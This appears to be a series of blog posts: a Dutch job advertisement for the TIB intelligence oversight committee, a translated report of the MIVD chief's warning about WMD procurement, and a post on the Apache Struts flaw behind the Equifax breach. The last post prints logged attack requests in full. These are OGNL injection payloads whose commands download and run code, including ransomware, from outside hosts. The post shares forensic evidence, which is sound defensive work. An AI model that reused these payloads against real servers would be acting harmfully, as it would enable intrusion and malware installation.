Vacancies for chair person & members of Toetsingcommissie Inzet Bevoegdheden (TIB), the ex-ante oversight committee established per the new Dutch spy law (Wiv20xx)

On 4 October 2017 a job advertisement appeared in NRC Handelsblad for a chair person & members of the “Toetsingcommissie Inzet Bevoegdheden” (TIB), the additional oversight committee established per the new Dutch spy law (Wiv20xx) that will perform binding ex-ante oversight on exercise of powers. PrivacyNieuws.nl (@PrivacyNleuws) published a picture (.gif) of the ad, which OCR’s back to the following text (in Dutch; OCR errors corrected):

Toetsingscommissie Inzet Bevoegdheden

In de nieuwe Wet op de inlichtngen- en veiligheidsdiensten 2017 (Wiv 2017) is voorzien in het instellen van een Toetsingscommissie Inzet Bevoegdheden (TIB). Deze commissie is een onafhankelijke commissie belast met met vooraf toetsen van de rechtmatigheid van de door de minister van Binnenlandse Zaken en Koninkrijksrelaties of minister van Defensie gegeven toestemming tot met inzetten van bepaalde bijzondere bevoegdheden door de Algemene inlichtingen- en Veiligheidsdienst (AIVD) respectievelijk de Militaire Inlichtingen- en Veiligheidsdienst (MIVD). Het oordeel van de TIB is bindend. Er is een initiatief voor een raadgevend referendum over de Wiv 2017. De regering en de Tweede Kamer der Staten-Generaal, hoewel zich bewust van dit initiatief, hechten eraan dat reeds thans met de werving wordt begonnen voor:

een voorzitter en leden voor de Toetsingscommissie Inzet Bevoegdheden (m/v)

Functie-eisen
Ten minste twee van de drie leden, onder wie de voorzitter, dienen ten minste zes jaar de functie van rechterlijk ambtenaar met rechtspraak belast, bedoeld in artikel 1, onderdeel c, van de Wet op de rechterlijke organisatie te hebben vervuld, dan wel ten minste zes jaar als lid van de Afdeling bestuursrechtspraak van de Raad van State, als lid belast met rechtspraak bij het College van Beroep voor het bedrijfsleven of als lid belast met rechtspraak bij de Centrale Raad van Beroep werkzaam te zijn geweest. Het derde lid beschikt bij voorkeur over een relevante technische deskundigheid en/of inzicht in veiligheidsrisico’s. Werkervaring als rechter-commissaris in strafzaken strekt tot aanbeveling.

Voor het vervullen van de functie is verder van belang dat de !eden over de Nederlandse nationaliteit beschikken, gezaghebbend zijn en publiekelijk vertrouwen genieten, beschikken over relevante kennis van of ervaring met het terrein van de AIVD en MIVD, alsmede een bewezen vermogen hebben om snel een oordeel te vormen in de complexe afweging van publieke belangen en de bescherming van privebelangen en individuele rechten.

De voorzitter onderhoudt de externe contacten van de TlB met de minister-president, de minister van Binnenlandse Zaken en Koninkrijksrelaties en de minister van Defensie, alsmede de directeur-generaal van de AIVD, de directeur van de MIVD en de voorzitter van de Commissie van Toezicht op de Inlichtingen- en Veiligheidsdiensten. De werkverdeling tussen de voorzitter, de overige !eden en het secretariaat van de TIB wordt nader uitgewerkt en vastgelegd in een Reglement van Orde.

Arbeidsvoorwaarden
Het beoogde tijdstip van aantreden is 1 januari 2018. De benoeming van de voorzitter betreft in principe een benoeming voor 20 uren per week en voor de overige twee !eden een benoeming voor 12 uren per week. Het aantal uren van de betrekking kan worden aangepast indien de werkzaamheden dat vergen. Alle drie de benoemingen gelden voor de termijn van zes jaar. Hierna kan eenmaal herbenoeming plaatsvinden voor een periode van zes jaar. Het salaris van de voorzitter is gelijk aan het maximum van salarisschaal 19 van bijlage A van het Bezoldigingsbesluit Burgerlijke Rijksambtenaren 1984. Het salaris van de leden is gelijk aan het maximum van salarisschaal 17 van bijlage B van het Bezoldigingsbesluit Burgerlijke Rijksambtenaren 1984. Op grond van artikel 100 van de Wiv 2017 kan iemand lid van de TlB zijn tot de leeftijd van zeventig jaren is bereikt.

Wervings- en benoemingsprocedure
De vice-president van de Raad van State, de president van de Hoge Raad der Nederlanden en de Nationale ombudsman stellen gezamenlijk een aanbevelingslijst op van ten minste drie kandidaten per vacature. Voor de benoeming van de voorzitter en !eden van de TIB wordt door de Tweede Kamer der Staten-Generaal per vacature een voordracht van ten minste drie personen gedaan waaruit de betrokken ministers een keuze maken. De functies zijn aangewezen als vertrouwensfuncties. Een veiligheidsonderzoek door de AIVD op A-niveau is dan ook onderdeel van de benoemingsprocedure.

Nadere informatie over de functies kunt u inwinnen bij de plaatsvervangend coördinator voor de inlichtingen- en veiligheidsdiensten, de heer mr. H.C.D. Korvinus, telefoon 070 – 356 41 80.

Uw schriftelijke sollicitatie voorzien van een curriculum vitae kunt u tot uiterlijk 20 oktober 2017 richten aan:

Vice-president Raad van State
Mr. J.RH. Donner
Postbus 20019
2500 EA Den Haag

EOF

Chief of Dutch military intelligence warns Dutch companies and institutes to be aware of foreign nations’ attempts to acquire knowledge and materials used to develop WMDs

UPDATE 2017-10-25: answers (.pdf, in Dutch; mirror) to parliamentary questions on this matter.

NOS reports (in Dutch) on an interview by ANP where the chief of the Dutch Military Intelligence & Security Service (MIVD) warns companies and (knowledge) institutes to be aware of attempts by foreign nations including North Korea, Iran, Pakistan and Syria to acquire materials and knowledge in the Netherlands. Here is my translation of the NOS report:

The Dutch intelligence & security services annually thwarts “a substantial number of attempts” by foreign countries to acquire knowledge and materials for WMDs. That is what Onno Eichelsheim, chief of the Military Intelligence & Security Service (MIVD), states in an interview with the ANP.

Eichelsheim won’t say how frequently it happens. The reason for that is that he does not want to reveal the capabilities of the department that exclusively deals with that. The MIVD chief only notes that the Unit Counterproliferation employs dozens of personnel, and informs the ministry of defense dozens of times annually, for instance with regard to export licenses.

Eichelsheim states that companies and knowledge institutes are little aware that countries such as North Korea, Iran, Pakistan and Syria attempt to acquire knowledge in the Netherlands. The Netherlands is a technologically high-developed country, which those countries are eager to use.

Smaller companies who make products such as ball bearings or heat-resistant materials must also be alert, Eichelsheim says.

Countries that are seeking high-grade materials always use covers, such as a company or a middle person. Eichelsheim says it is certainly suspicious if a customer is willing to pay a high price for materials or chemicals that can be purchased elsewhere for a fraction of the price. Companies and institutes must be aware that their products can be used in the development of WMDs.

EOF

Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated their compromise happened through exploitation of a vulnerability in Apache Struts CVE-2017-5638 — published March 2017 when used in the wild — that involves a crafted Content-Type HTTP request header. For those interested, here are log rules of 28 (untargeted) requests that attempted to exploit this vulnerability on my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to right in the grey dialog below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and /bin/bash on non-Windows systems. 12 of 28 cases attempt to download & run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and seem to be probes for vulnerability. In (only) one case the payload could still be accessed: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So, this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.

blog.cyberwar.nl-forensic.log:+25030:58c2e12a:40|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/.jb %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/.jb ; fetch http%3a//65.254.63.20/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+18708:58ce3b02:5f|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+25980:58d00e81:14|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+5491:58d2431c:10|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c echo open 82.165.129.119 21 >> ik &echo user anonymous anonymous>> ik &echo binary >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s%3aik &del ik &1.exe &exit').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+5481:58d2431c:21|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/a%7csh ; rm -rf a ; curl -O http%3a//65.254.63.20/a ; sh a ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+4485:58d2431c:34|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='BITSAdmin.exe /Transfer JOB http%3a//82.165.129.119/UnInstall.exe %25TEMP%25/UnInstall.exe & %25TEMP%25/UnInstall.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+13314:58d45e97:54|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+4017:58ebf9b6:46|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14242:58f02f0c:f9|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+16047:58f02f12:9|GET /login/ HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+15024:58f02f14:b2|GET /wp-login.php HTTP/1.1|Accept-Encoding:identity|Host:blog.cyberwar.nl|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+6171:590e8bf2:64|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+21732:59233fb2:7|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 185.159.82.142/10 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+26909:5924b39c:2d|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14205:592ab9f1:d8|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15355:592ab9f1:16|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15448:592ab9f1:4|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+12791:59359766:28|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
